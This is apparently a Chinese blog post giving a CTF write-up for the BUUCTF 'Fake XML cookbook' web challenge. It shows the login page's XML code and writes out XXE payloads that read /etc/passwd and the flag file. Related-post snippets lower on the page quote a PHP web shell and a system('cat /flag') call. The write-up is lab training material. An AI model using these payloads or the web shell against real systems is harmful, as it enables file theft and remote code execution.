BUUCTF——Fake XML cookbook

最新推荐文章于 2025-05-05 20:07:34 发布
最新推荐文章于 2025-05-05 20:07:34 发布
阅读量484 收藏 2
点赞数 9
分类专栏: BUUCTF 文章标签: xml web安全 网络安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71914594/article/details/147700167
版权

BUUCTF——Fake XML cookbook

进入靶场

在这里插入图片描述

只有一个登录框

先弱口令万能密码试一下吧

在这里插入图片描述

弱口令和万能密码都失败了

找其他突破口

F12看看

在这里插入图片描述

发现xml代码

function doLogin(){
	var username = $("#username").val();
	var password = $("#password").val();
	if(username == "" || password == ""){
		alert("Please enter the username and password!");
		return;
	}
	
	var data = "<user><username>" + username + "</username><password>" + password + "</password></user>"; 
    $.ajax({
        type: "POST",
        url: "doLogin.php",
        contentType: "application/xml;charset=utf-8",
        data: data,
        dataType: "xml",
        anysc: false,
        success: function (result) {
        	var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
        	var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
        	if(code == "0"){
        		$(".msg").text(msg + " login fail!");
        	}else if(code == "1"){
        		$(".msg").text(msg + " login success!");
        	}else{
        		$(".msg").text("error:" + msg);
        	}
        },
        error: function (XMLHttpRequest,textStatus,errorThrown) {
            $(".msg").text(errorThrown + ':' + textStatus);
        }
    }); 
}

大概率是XXE漏洞

抓包试试看

构造payload

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///etc/passwd">
  ]>
<user><username>&admin;</username><password>admin</password></user>

成功读取passwd

在这里插入图片描述

确定了是XXE漏洞

那就直接构造payload找flag

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>admin</password></user>

在这里插入图片描述

拿到flag

flag{21deb39d-191e-459b-9881-675752ca1dba}

下播!!!!

在这里插入图片描述

BUU刷题记录——2
weixin_43610673的博客
06-17 2123
[极客大挑战 2019]Upload 上传检测后缀名,文件内容不能有<? 上传a1.jpg GIF89a? <script language="php">eval($_REQUEST[cmd])</script> Bp抓包修改下文件名 不能有php /upload/a1.phtml?cmd=system(‘cat /flag’); [ACTF2020 新生赛]BackupFile /index.php.bak 下载源码 PHP的弱类型特性,int和string是无法直接比
BUUCTF刷题记录(持续更新中~)
热门推荐
xiaolong22333的博客
04-03 7万+
之前陆陆续续做过一些题,但都没有记录,这次打算巩固一下,记录下来。 .
[NCTF2019]Fake XML cookbook 1
shinygod的博客
03-13 2096
知识点:XML实体注入漏洞(XXE) 原理:XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 详细了解 查看源代码,访问doLogin.php 访问doLogin.php,提示加载外部xml实体 DOCTYPE(文档类型定义的声明) ENTITY(实体的声明) SYSTEM、PU
【学习笔记 46】 buu [NCTF2019]Fake XML cookbook
weixin_43553654的博客
08-03 454
0x00 知识点 XXE攻击 0x01 知识点详解 什么是XXE攻击? 答: XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 这里有一篇大佬的博客可以学习学习 0x02 解题思路
[ctf web]XXE通过DTD读取文件+XML和DTD基础语法(以[ctfshow]web_ak4观心和[NCTF2019]Fake XML cookbook为例)
ShenZ的博客
08-23 804
XML基础 XML文件可以分为三部分: XML声明 <?xml version ="1.0" encoding="UTF-8"?> DTD文档定义类型。 文档元素 <foo><note category="COOKING"></note></foo> 根元素foo,子元素note,属性category XML语法 XML被设计为传输和存储数据 基本语法: - 所有 XML 元素都须有关闭标签。 - XML 标签对大小写敏感。 - X
FAKE-Cookbook:Build.fsx的食谱
05-08
FAKE-Cookbook: Build.fsx 食谱详解】 在软件开发中,构建自动化是提高效率的关键步骤。FAKE(F# Make)是一个基于F#语言的构建自动化工具,它模仿了Unix中的Make工具,但提供了更高级的功能和更友好的语法。在...
论文列表——fake news
ZSY的大后台
10-04 2885
列出自己阅读的fake news detection论文的列表,以后有时间再整理相应的笔记。阅读价值评分纯粹是基于自己对于文章的理解,标准包括:动机、方法、数据集质量、实验安排、相关工作等,满分为5。列表如下: 名称 所属会议 类型 时间 阅读价值 “Liar, Liar Pants on Fire”: A New Benchmark Dataset for Fake News D...
数电发票整理:免费实用工具如何高效解析 XML 发票数据
2501_91484091的博客
04-30 921
如今,最新格式的数电发票采用 XML 格式,但直接打开时呈现的是一堆杂乱无章的代码,财务人员无法直接从中获取有用信息,这无疑给日常工作带来了诸多不便。而今天推荐的这款 XML 发票阅读器,能够高效地批量解析 XML 代码,将其转化为直观的图形化数电发票形式,方便财务人员查看。使用时,只需将需要转换的 XML 文件拖入软件,双击即可轻松打开查看发票详情。
Linux C++ xercesc xml 怎么判断路径下有没有对应的节点
SmileHergo的博客
04-30 1075
catch (const XMLException& e) { // 捕获并处理异常,例如无效的XPath表达式等。if (resultObj->getSnapshotLength() > 0) { // 检查是否有匹配的节点。// 不存在节点,返回false。
Spring 基于 XML 的自动装配:原理与实战详解
m0_73941339的博客
05-03 898
Spring 的自动装配是指在 Spring 容器创建 Bean 实例时,根据预先设定的规则,自动将 Bean 之间的依赖关系进行注入,无需手动为每个依赖项编写<property>或<constructor-arg>标签。自动装配的出现,减少了配置文件中的冗余代码,提高了开发效率,同时也增强了代码的可维护性和可读性。​Spring 提供了五种自动装配模式,分别是:​no:默认模式,不启用自动装配,需要手动配置所有依赖关系。​byName:根据属性名查找匹配的 Bean 进行装配。
JAVA:使用 XStream 实现对象与XML转换的技术指南
木头
05-02 155
JAVA:使用 XStream 实现对象与XML转换的技术指南
Gf1 xml 文件解析到geojson 文件
wu_jing_sheng0的专栏
04-30 409
【代码】Gf1 xml 文件解析到geojson 文件。
第十章.XML
pound127的博客
05-04 883
EXtensible Markup Language ,可扩充标记语言XML与操作系统,编程语言的开发平台无关实现不同系统之间的数据交换数据交互配置应用程序和网站XML标签xml文档由一系列标签元素组成<元素名 属性名 = “属性值”> 元素内容 </元素名>属性值用双引号包裹一个元素可以有多个属性属性值不能直接包括<,",&(不建议:',>)便签编写注意事项:所有XML标签必须有结束标签对大小写敏感必须正确的嵌套同级标签以缩进对齐。
xml 和 yaml 的区别
u013798595的博客
05-01 508
XML 和 YAML/YML 是两种常用的数据序列化格式,用于存储和读取结构化数据。
2025蓝桥杯省赛网络安全组wp
2301_79035389的博客
04-27 1559
这个也是在赛后才想明白,aes加密用的是十六字节,将前十一个都填成AAAA发过去,因为ecb模式是分组加密,每一组的加密过程都是一样的,所以不需要写脚本还原加密过程去破解(其实硬写也做不到,因为拿不到key,当时我觉得用户名肯定是key,不然解不了,于是就一直卡在这一步了,实际上用户名是明文),直接将发过来的加密数据取出后几组就是admin的加密了。首先是一个按位与,我们都知道,如果gift的结果是1,那说明参与按位与的两个数在对应位置上一定是1.这道题想到思路了,但是忘记dfs怎么写了,脚本没写出来。
IEEE会议:第十届网络安全与信息工程国际会议(ICCSIE 2025)
iaast的博客
04-28 694
2025西部信息工程与技术学术论坛暨第十届网络安全与信息工程国际会议(10th International Conference on Cyber Security and Information Engineering)将于7月23-25日西宁召开。本届会议由北京工业大学、青海理工学院主办,浙江工业大学协办,IEEE计算机学会(IEEE Computer Society)技术赞助。
网络安全零基础培训 L1-9 PHP连接MySQL数据库
2401_86544210的博客
05-01 838
MySQLi是 PHP 用于与 MySQL 数据库进行交互的扩展。
网络安全的原理和基本知识点
最新发布
mrzyun0811的博客
05-05 284
Python在网络安全防护中具有广泛的应用,通过利用丰富的库和模块,可以实现网络扫描、漏洞检测、渗透测试、恶意软件分析、防火墙规则管理、Web安全防护、安全日志分析和加密通信等功能,帮助提升网络系统的安全性和抵御潜在威胁的能力。网络安全:保护网络系统和数据免受攻击、损坏或未经授权的访问,确保其机密性、完整性和可用性。使用Python解析和分析系统日志、网络流量日志,检测异常活动,及时发现潜在的安全威胁。使用nmap库进行端口扫描和主机发现,识别网络中的开放端口和服务,发现潜在漏洞。
2024 网络安全回顾与 2025 展望:守护数字世界的新征程
weixin_43172311的博客
05-01 793
数据来源:安全内参在当今数字化时代,网络如同一张无形的大网,将世界紧密相连。我们在享受网络带来便捷的同时,也面临着日益严峻的网络安全挑战。今天,就让我们一起来回顾 2024 年网络安全产业的发展态势,并展望一下 2025 年的趋势。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值